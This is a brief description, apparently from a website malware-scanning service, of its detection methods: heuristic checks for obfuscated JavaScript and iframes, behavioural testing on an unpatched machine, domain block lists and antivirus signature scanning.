We use different methods to detect malware. These are simply different ways to identify malware.
Heuristic analysis identifies source code typically used in malicious attacks. The heuristic analysis scan tests occur in the first phase of the malware scan using signature rules.
Using heuristic analysis the service can identify:
- Encoded JavaScript. URL-encoded JavaScript that is used to obfuscate the JavaScript content.
- Document.writes with obfuscation. The Document.Write method is used to dynamically generate content in a new web browser. Obfuscation functions are used by malware authors to disguise their content.
- Vulnerable Control Instantiation. Attempts to call a control that has known vulnerabilities.
- Character Encoding Inside of Inline Frames. Iframes load an external source inside of the current window. Malicious software often encodes this content to obfuscate what it is doing.
This approach identifies malware based on a web site's behavior. Our service tests the site's behavior by visiting the site with a vulnerable browser and operating system, and running tests using this unpatched machine to determine if the site behaves outside of normal operating guidelines. We monitor the unpatched machine to verify whether suspicious behavior has occurred.
Using behavioral analysis, the service can identify:
- Microsoft Windows registry keys being written
- Rogue processes being started
- Programs being installed and started
- Unexpected files being written to disk
Crawled pages, referenced URLs, and remotely loaded resources are checked against public exclude lists of known-malicious domains and content.
Downloaded scripts, files, and binaries are scanned with traditional anti-virus signatures to identify additional malicious programs.